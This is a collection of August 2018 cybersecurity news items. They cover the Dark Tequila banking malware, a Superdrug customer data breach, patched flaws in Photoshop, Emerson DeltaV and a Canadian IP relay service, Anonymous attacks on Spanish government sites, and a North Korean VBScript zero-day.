Kaspersky highlighted that the level of sophistication of the threat is unusual for financial fraud schemes, it implements complex evasion techniques. The malware is delivered only if certain technical conditions are met, it is able to detect analysis environments and security solutions. infection.

Dark Tequila campaign delivers an advanced keylogger that went undetected at least for five years due to its highly targeted nature and a few evasion techniques.

According to the experts, the threat actor behind the Dark Tequila malware strictly monitors and controls all operations. In case the malware casually infects a system, a machine that is not in Mexico or that is not of interest, the malware is uninstalled remotely from the victim’s machine.

Dark Tequila has a modular structure, Kaspersky listed the following 6 primary modules:

Module 1, which is responsible for communication with the command and control server. It verifies if a man-in-the-middle network check is being performed, by validating the certificates with a few very popular websites.
Module 2 – CleanUp. If the service detects any kind of ‘suspicious’ activity in the environment, such as the fact that it is running on a virtual machine, or that debugging tools are running in the background, it will execute this module to perform a full cleanup of the system, removing the persistence service as well as any files created previously on the system.
Module 3 – Keylogger and Windows Monitor. This is designed to steal credentials from a long list of online banking sites, as well as generic Cpanels, Plesk, online flight reservation systems, Microsoft Office365, IBM lotus notes clients, Zimbra email, Bitbucket, Amazon, GoDaddy, Register, Namecheap, Dropbox, Softlayer, Rackspace, and other services.
Module 4 – Information stealer, which is designed to steal saved passwords in email and FTP clients, as well as from browsers.
Module 5 – The USB infector. This copies an executable file to a removable drive to run automatically. This enables the malware to move offline through the victim’s network, even when only one machine was initially compromised via spear-phishing. When another USB is connected to the infected computer, it automatically becomes infected, and ready to spread the malware to another target.
Module 6 – The service watchdog. This service is responsible for making sure that the malware is running properly.
The Dark Tequila campaign is still active, further details including the IoCs are reported in the blog post published by Kaspersky.

Crooks claim to have stolen 20k customer records from Superdrug cosmetics retailer
21.8.2018 securityaffairs Incindent

Hackers claim to have stolen the personal details of almost 20,000 Superdrug customers who shopped online at the cosmetics retailer.
The British Superdrug is the last victim of a security breach, hackers claim to have stolen the personal details of almost 20,000 people who shopped online at the cosmetics retailer.

Hackers accessed customers’ names, addresses and in some cases dates of birth, phone number and points balances.

The company has confirmed the incident, the good news is that hackers did not access payment card details.

Superdrug notified the incident to the customers via email warning of the “possible disclosure of your personal data, but not including your payment card information.”

The hackers contacted the company on Monday evening informing it they had obtained details on approximately 20,000 customers, as a proof of the hack they shared details of 386 of the accounts compromised.

“The hacker shared a number of details with us to try and ‘prove’ he had customer information – we were then able to verify they were Superdrug customers from their email and log-in.” reported the DailyMail citing a spokeswoman for the company.

The hackers likely attempted to blackmail the company to avoid to publicly disclosed the hack.

“The crooks alleged they had “obtained information on approximately 20,000 customers but we have only seen 386,”


To customers who have received an email from us today, this email is genuine. We recommend you follow the steps we outlined.

6:29 PM - Aug 21, 2018
517 people are talking about this
Twitter Ads info and privacy
“On the evening of the 20th of August, we were contacted by hackers who claimed they had obtained a number of our customers’ online shopping information,” the note from boss Peter Macnab stated.

“There is no evidence that Superdrug’s systems have been compromised. We believe the hacker obtained customers’ email addresses and passwords from other websites and then used those credentials to access accounts on our website.”

superdrug cosmetics

Superdrug tried to downplay the incident, sustaining that the hackers obtained the credentials from third-party data breaches. Crooks exploited the fact people reuse their passwords across various web services.

Anyway, Superdrug customers need to reset the password they use to access to

Superdrug reported the issue to the authorities and Action Fraud and it “will be offering them all the information they need for their investigation.”

“We have contacted the Police and Action Fraud (the UK’s national fraud and cyber crime arm) and will be offering them all the information they need for their investigation as we continue to take the responsibility of safeguarding our customers’ data incredibly seriously.” reads the note sent via email to the customers.

Adobe security updates address 2 critical code execution flaws in Photoshop
21.8.2018 securityaffairs

Yesterday Adobe released security updates for two critical code execution vulnerabilities affecting Windows and macOS versions of Photoshop CC.
Adobe released updates to address two critical code executions flaws that affect Photoshop for Windows and macOS versions of Photoshop CC.

The vulnerabilities, tracked as CVE-2018-12810 and CVE-2018-12811, are memory corruption issues that could be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

“Adobe has released updates for Photoshop CC for Windows and macOS. These updates resolve critical vulnerabilities in Photoshop CC 19.1.5 and earlier 19.x versions, as well as 18.1.5 and earlier 18.x versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Adobe addressed both flaws with the release of versions 19.1.6 and 18.1.6.

The vulnerabilities affect Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions.

Adobe Photoshop

The Adobe Patch Tuesday for August 2018 addressed a total of 11 vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader.

None of the patched vulnerabilities been exploited by attackers in the wild.

Flaws in Emerson Workstations Allow Lateral Movement
21.8.2018 securityweek ICS

Researchers working for two industrial cybersecurity firms have discovered several critical and high severity vulnerabilities in Emerson DeltaV DCS Workstations. The vendor has released patches that should resolve the flaws.

Emerson DeltaV Workstations are purpose-built computers specifically designed to run DeltaV applications. According to ICS-CERT, these systems are used worldwide, mainly in the chemical and energy sectors.

An advisory published last week by ICS-CERT reveals that DeltaV DCS Workstation versions 11.3.1, 12.3.1, 13.3.0, 13.3.1 and R5 are impacted by four serious vulnerabilities.

The security holes were discovered by Nozomi Networks and one of them was independently identified by Ori Perez, security researcher at CyberX.DeltaV Workstation vulnerabilities

The most serious of the flaws, based on its CVSS score, is CVE-2018-14793, a stack-based buffer overflow that can be exploited for arbitrary code execution via an open communication port.

Also highly severe is the vulnerability discovered by Perez, CVE-2018-14795, which ICS-CERT described as an improper path validation issue that may allow an attacker to replace executable files.

“We were able to analyze the protocol and issue specially crafted commands in order to achieve remote code execution using that vulnerability,” CyberX VP of Research David Atch told SecurityWeek. “The vulnerability is a result of a coding error, which means that default Windows security mechanisms such as ASLR and DEP won't prevent the remote code execution.”

The two other flaws, also classified as “high severity,” are a DLL hijacking issue that can lead to arbitrary code execution (CVE-2018-14797), and a vulnerability that allows non-admin users to change executable and library files on the affected workstations (CVE-2018-14791).

DeltaV Workstation vulnerabilities

Exploiting these security holes can allow an attacker to move laterally within the targeted network and possibly take control of other DeltaV workstations, CyberX and Nozomi told SecurityWeek. However, there is currently no evidence of public exploits specifically targeting these flaws.

Exploitation of the vulnerabilities requires access to the targeted workstation, either over the local network or the Internet. However, CyberX says it has not seen any DeltaV workstations directly accessible from the Web.

Moreno Carullo, co-founder and chief technical officer at Nozomi, pointed out that the notorious Triton/Trisis malware also first targeted a workstation.

Emerson has provided patches for each of the affected DeltaV Workstation versions. The company also noted that application whitelisting can block exploitation of most of these flaws as it would prevent files from being overwritten.

“To limit exposure to these and other vulnerabilities, Emerson recommends deploying and configuring DeltaV systems and related components as described in the DeltaV Security Manual, which is available in Emerson’s Guardian Support Portal,” ICS-CERT said in its advisory.

Anonymous Hackers Target Spain Sites in Catalonia Protest
21.8.2018 securityweek Hacking

Hackers from the Anonymous collective claimed responsibility for bringing down government websites in Spain on Monday in a protest against Madrid's efforts to block Catalonia's separatist drive.

The sites, which included the official websites of the Constitutional Court and the economy and foreign ministries, went offline on Monday and could still not be accessed by early evening.

Anonymous, a loosely knit group that has attacked financial and government websites around the world, said it orchestrated the shutdowns.

"Hey Spain, we see that you are still hurting the Catalan people. This is not a joke. We will hurt your government as well!," the group wrote in a statement posted on its Twitter feed.

Anonymous temporarily blocked the Constitutional Court's website in October 2017 just as Spain's central government prepared to announce unprecedented measures to seize powers from Catalonia's regional government over its threat to break away from the rest of the country.

The hacker group originated in 2003, adopting the Guy Fawkes mask as its symbol. The mask is a stylised portrayal of an oversized smile, red cheeks and a wide moustache upturned at both ends.

North Korean Hackers Exploit Recently Patched Zero-Day
21.8.2018 securityweek  BigBrothers  

North Koren hackers are exploiting a recently patched vulnerability in Microsoft's VBScript engine vulnerability in live attacks, security researchers say.

Tracked as CVE-2018-8373, the bug was identified as a memory corruption issue that would result in remote code execution in the context of the current user. The flaw resides in the manner in which the VBScript scripting engine handles objects in memory in Internet Explorer.

“[A]n attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine,” Microsoft said.

Impacting the VBScript engine in the latest versions of Windows, the vulnerability does not affect Internet Explorer 11, as “VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default,” Trend Micro, the security firm that discovered the flaw last month, says.

The security company also notes that the discovered exploit sample uses the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code execution flaw that Microsoft addressed in May.

The method for exploiting CVE-2018-8373 and running shellcode is also similar to the CVE-2018-8174 exploits, which further suggests that the same author is behind both. The creator used a new use-after-free (UAF) vulnerability in vbscript.dll, which remained unpatched in the latest VBScript engine, Trend Micro says.

Last week, Dustin Childs, communications manager for the ZDI, told SecurityWeek that the similarities between these flaws seem more than coincidental. He also pointed out that further exploits could emerge from the same group.

While Trend Micro did not attribute the attacks to a specific actor, Qihoo 360’s security researchers claim that the North Korean threat actor known as DarkHotel is behind both exploits.

The researchers say the domain name used by the zero-day exploit is the same they observed in May being used for CVE-2018-8174’s exploitation and that it is indeed linked to DarkHotel.

Qihoo 360, which has been tracking DarkHotel for a while, appears confident that this is the threat actor that has been exploiting CVE-2018-8373 since before it was patched.

“Based on our analysis, this vulnerability can be steadily exploited. Moreover, since it is the second VB engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future,” Trend Micro said.

First detailed in 2014, the DarkHotel advanced persistent threat (APT) actor was recently said to be connected to the infamous Lazarus Group. Based on the reuse of code between various malware families attributed to North Korean actors, Intezer and McAfee concluded that most of the malicious tools link back to Lazarus.

Anonymous collective brought down Spain sites to support Catalonia
21.8.2018 securityaffairs Hacking

Anonymous targeted many governments websites in Spain to protest against the Government’s efforts to block Catalonia ‘s separatist wave.
Members of the notorious Anonymous collective claimed responsibility for bringing down several government websites in Spain on Monday to protest against the decision of the government to block Catalonia’s separatist drive.

Anonymous brought down the websites of the Constitutional Court and the economy and foreign ministries on Monday as part of an operation called #OpCatalunya.

vanessa junqué ©️
#OpCatalunya: New attacks against Spanish Government

Administracion Website and Consejo Transparencia are #TangoDown#Anonymous

4:23 PM - Aug 20, 2018
15 people are talking about this
Twitter Ads info and privacy
“Hey Spain, we see that you are still hurting the Catalan people. This is not a joke. We will hurt your government as well!,” reads a message published by Anonymous on Twitter.


This isn’t the first time that the collective target the Constitutional Court’s website, in October 2017 while Spain’s government was announcing the seizure of powers from Catalonia’s regional government due to the separatist movements in the region.

Vulnerability in IP Relay Service Impacts Major Canadian ISPs
21.8.2018 securityweek

A recently addressed local file disclosure vulnerability in the SOLEO IP Relay service impacted nearly all major Internet service providers (ISPs) in Canada, a security researcher has discovered.

Also known as telecommunications relay services (TRSs), the IP relays developed by Soleo Communications are available through all major ISPs in Canada.

The cloud-based IP Relay service was launched over half a decade ago to allow hearing-impaired individuals and those with speech disorders to place calls through a TTY (text terminal) or other assistive telephone device.

Because of improper input sanitization, these services exposed sensitive user information, Project Insecurity researcher Dominik Penner discovered.

In a report (PDF) published late last week, the security researcher explains that the security flaw could be abused to determine the layout of the IPRelayApp directory and find the location of the source files on the IP Relay server. All of the discovered files could then be downloaded by an attacker, the researcher says.

The files were found to be classes compiled in Java bytecode, but “a determined attacker would easily be able to convert this directly back to source, compromising source code and other sensitive files,” Penner points out.

The source code also includes passwords the servlet uses to communicate with other services and an attacker able to extract these passwords could then either escalate their privileges on the server or abuse the extracted information in social engineering attacks.

“The end result could be escalated to yield remote code execution, though we were not comfortable attempting to do this before getting in contact with the vendor,” the researcher notes.

Working in collaboration with security researcher Manny Mand, Penner discovered that at least ten Canadian ISPs were running the vulnerable instance of Soleo’s IP Relay. Six of these, Penner says, are the largest telecom providers in Canada.

“[W]e have confirmed that a determined attacker (APT/foreign entity) could leverage this vulnerability to steal passwords from configuration files across multiple providers, compromise said providers using the stolen passwords, and then potentially​ launch a large scale identity theft operation against Canadians,” the researcher says.

An attacker exploiting the vulnerability could compromise over 30 million Canadian records, he said.

The bug was reported to the vendor on July 19 and was confirmed as patched on August 10.